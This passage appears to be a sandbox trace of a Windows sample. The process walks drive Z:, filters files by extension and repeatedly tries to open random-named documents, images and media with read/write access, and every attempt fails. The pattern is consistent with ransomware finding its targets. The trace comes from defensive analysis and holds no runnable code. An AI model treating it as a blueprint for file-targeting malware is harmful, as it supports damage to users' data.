ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb66634, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x12190, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D5VR0w7cu20SVOPPmTeY.pdf", cAlternateFileName="")) returned 1 [0177.589] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0177.589] PathFindExtensionW (pszPath="Z:\\D5VR0w7cu20SVOPPmTeY.pdf") returned=".pdf" [0177.594] CreateFileW (lpFileName="Z:\\D5VR0w7cu20SVOPPmTeY.pdf" (normalized: "z:\\d5vr0w7cu20svoppmtey.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.596] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0177.596] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbc80c4, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266af9c2, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbc80c4, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xcf0a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pEa7gL.ppt", cAlternateFileName="")) returned 1 [0177.596] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0177.596] PathFindExtensionW (pszPath="Z:\\pEa7gL.ppt") returned=".ppt" [0177.601] CreateFileW (lpFileName="Z:\\pEa7gL.ppt" (normalized: "z:\\pea7gl.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.602] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0177.602] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb8d73a, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265d8c3a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb8d73a, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x5d64, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SSGieDhFJl7c1ARWbn5.avi", cAlternateFileName="")) returned 1 [0177.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0177.602] PathFindExtensionW (pszPath="Z:\\SSGieDhFJl7c1ARWbn5.avi") returned=".avi" [0177.607] CreateFileW (lpFileName="Z:\\SSGieDhFJl7c1ARWbn5.avi" (normalized: "z:\\ssgiedhfjl7c1arwbn5.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0177.609] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb8d73a, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265d8c3a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb8d73a, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x1851f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R7Kb10e3K.ppt", cAlternateFileName="")) returned 1 [0177.609] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.609] PathFindExtensionW (pszPath="Z:\\R7Kb10e3K.ppt") returned=".ppt" [0177.614] CreateFileW (lpFileName="Z:\\R7Kb10e3K.ppt" (normalized: "z:\\r7kb10e3k.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.615] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.615] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266cce83, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x6142, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wM2fuYVT5vb5rvE.avi", cAlternateFileName="")) returned 1 [0177.615] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.615] PathFindExtensionW (pszPath="Z:\\wM2fuYVT5vb5rvE.avi") returned=".avi" [0177.620] CreateFileW (lpFileName="Z:\\wM2fuYVT5vb5rvE.avi" (normalized: "z:\\wm2fuyvt5vb5rve.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.622] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.622] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb4916f, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26546475, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb4916f, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x53dd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0O40RGXx.ods", cAlternateFileName="")) returned 1 [0177.622] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0177.622] PathFindExtensionW (pszPath="Z:\\0O40RGXx.ods") returned=".ods" [0177.627] CreateFileW (lpFileName="Z:\\0O40RGXx.ods" (normalized: "z:\\0o40rgxx.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.629] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0177.629] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb8d73a, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265d8c3a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb8d73a, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xfcef, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RKixholu7QWBM4vIh2Qr.ots", cAlternateFileName="")) returned 1 [0177.629] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0177.629] PathFindExtensionW (pszPath="Z:\\RKixholu7QWBM4vIh2Qr.ots") returned=".ots" [0177.634] CreateFileW (lpFileName="Z:\\RKixholu7QWBM4vIh2Qr.ots" (normalized: "z:\\rkixholu7qwbm4vih2qr.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.636] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0177.636] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ec4bb, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x1446d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Z0KtpLCKl6lOwI.csv", cAlternateFileName="")) returned 1 [0177.636] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.636] PathFindExtensionW (pszPath="Z:\\Z0KtpLCKl6lOwI.csv") returned=".csv" [0177.642] CreateFileW (lpFileName="Z:\\Z0KtpLCKl6lOwI.csv" (normalized: "z:\\z0ktplckl6lowi.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.644] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.644] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2667ec80, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xd1d1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="b2RYQsRYMuiCI5kbmBC.avi", cAlternateFileName="")) returned 1 [0177.644] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0177.644] PathFindExtensionW (pszPath="Z:\\b2RYQsRYMuiCI5kbmBC.avi") returned=".avi" [0177.649] CreateFileW (lpFileName="Z:\\b2RYQsRYMuiCI5kbmBC.avi" (normalized: "z:\\b2ryqsrymuici5kbmbc.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.650] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0177.651] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb83af9, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ceffa, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb83af9, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xf76c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OU7w0ZlZCz.png", cAlternateFileName="")) returned 1 [0177.651] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.651] PathFindExtensionW (pszPath="Z:\\OU7w0ZlZCz.png") returned=".png" [0177.656] CreateFileW (lpFileName="Z:\\OU7w0ZlZCz.png" (normalized: "z:\\ou7w0zlzcz.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.657] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.657] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266c3242, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x1025d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vHFD0HXkcrOt.ppt", cAlternateFileName="")) returned 1 [0177.657] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.657] PathFindExtensionW (pszPath="Z:\\vHFD0HXkcrOt.ppt") returned=".ppt" [0177.663] CreateFileW (lpFileName="Z:\\vHFD0HXkcrOt.ppt" (normalized: "z:\\vhfd0hxkcrot.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.664] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.664] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265e287a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x14f11, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="U2QSFlSKH2V.jpg", cAlternateFileName="")) returned 1 [0177.664] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.664] PathFindExtensionW (pszPath="Z:\\U2QSFlSKH2V.jpg") returned=".jpg" [0177.670] CreateFileW (lpFileName="Z:\\U2QSFlSKH2V.jpg" (normalized: "z:\\u2qsflskh2v.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.674] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.674] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb83af9, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265c53b9, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb83af9, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x74a1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NW3xaHb7.gif", cAlternateFileName="")) returned 1 [0177.674] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0177.674] PathFindExtensionW (pszPath="Z:\\NW3xaHb7.gif") returned=".gif" [0177.679] CreateFileW (lpFileName="Z:\\NW3xaHb7.gif" (normalized: "z:\\nw3xahb7.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.681] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0177.681] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266cce83, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x82b7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ybbGvlCczfIkCAzvoOo.ods", cAlternateFileName="")) returned 1 [0177.681] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0177.681] PathFindExtensionW (pszPath="Z:\\ybbGvlCczfIkCAzvoOo.ods") returned=".ods" [0177.686] CreateFileW (lpFileName="Z:\\ybbGvlCczfIkCAzvoOo.ods" (normalized: "z:\\ybbgvlcczfikcazvooo.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.688] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0177.688] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb5c9f2, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26563936, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb5c9f2, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x11145, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AEuRQDrOl9iFUCUZ.gif", cAlternateFileName="")) returned 1 [0177.688] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.688] PathFindExtensionW (pszPath="Z:\\AEuRQDrOl9iFUCUZ.gif") returned=".gif" [0177.694] CreateFileW (lpFileName="Z:\\AEuRQDrOl9iFUCUZ.gif" (normalized: "z:\\aeurqdrol9ifucuz.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.695] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.695] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbbe482, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266af9c2, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbbe482, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xebaa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="oHbaMQLYen9icdKg.docx", cAlternateFileName="")) returned 1 [0177.695] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0177.695] PathFindExtensionW (pszPath="Z:\\oHbaMQLYen9icdKg.docx") returned=".docx" [0177.700] CreateFileW (lpFileName="Z:\\oHbaMQLYen9icdKg.docx" (normalized: "z:\\ohbamqlyen9icdkg.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.701] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0177.701] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb5c9f2, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26563936, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb5c9f2, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x17cec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8epnap.wav", cAlternateFileName="")) returned 1 [0177.701] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0177.702] PathFindExtensionW (pszPath="Z:\\8epnap.wav") returned=".wav" [0177.706] CreateFileW (lpFileName="Z:\\8epnap.wav" (normalized: "z:\\8epnap.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.708] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0177.708] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ec4bb, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x67e0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XhyKggx8pHn779f8mb.swf", cAlternateFileName="")) returned 1 [0177.708] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0177.708] PathFindExtensionW (pszPath="Z:\\XhyKggx8pHn779f8mb.swf") returned=".swf" [0177.713] CreateFileW (lpFileName="Z:\\XhyKggx8pHn779f8mb.swf" (normalized: "z:\\xhykggx8phn779f8mb.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.714] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0177.714] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbbe482, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266a5d81, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbbe482, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x82d6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="l5waVaq5umcw.wav", cAlternateFileName="")) returned 1 [0177.715] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.715] PathFindExtensionW (pszPath="Z:\\l5waVaq5umcw.wav") returned=".wav" [0177.719] CreateFileW (lpFileName="Z:\\l5waVaq5umcw.wav" (normalized: "z:\\l5wavaq5umcw.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.721] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.721] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbb4840, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2669c141, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbb4840, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xa870, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gSQ2YGk9scQfUsGUcoij.wav", cAlternateFileName="")) returned 1 [0177.721] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0177.721] PathFindExtensionW (pszPath="Z:\\gSQ2YGk9scQfUsGUcoij.wav") returned=".wav" [0177.726] CreateFileW (lpFileName="Z:\\gSQ2YGk9scQfUsGUcoij.wav" (normalized: "z:\\gsq2ygk9scqfusgucoij.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.727] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0177.727] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb70276, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26580df7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb70276, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xd55d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="H4BFdNII7HeaE.swf", cAlternateFileName="")) returned 1 [0177.727] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.727] PathFindExtensionW (pszPath="Z:\\H4BFdNII7HeaE.swf") returned=".swf" [0177.731] CreateFileW (lpFileName="Z:\\H4BFdNII7HeaE.swf" (normalized: "z:\\h4bfdnii7heae.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.733] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.733] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbaabff, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266888c0, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbaabff, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x5b66, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dUSDGqr.odt", cAlternateFileName="")) returned 1 [0177.733] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0177.733] PathFindExtensionW (pszPath="Z:\\dUSDGqr.odt") returned=".odt" [0177.739] CreateFileW (lpFileName="Z:\\dUSDGqr.odt" (normalized: "z:\\dusdgqr.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.740] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0177.740] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb4916f, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26546475, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb4916f, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, 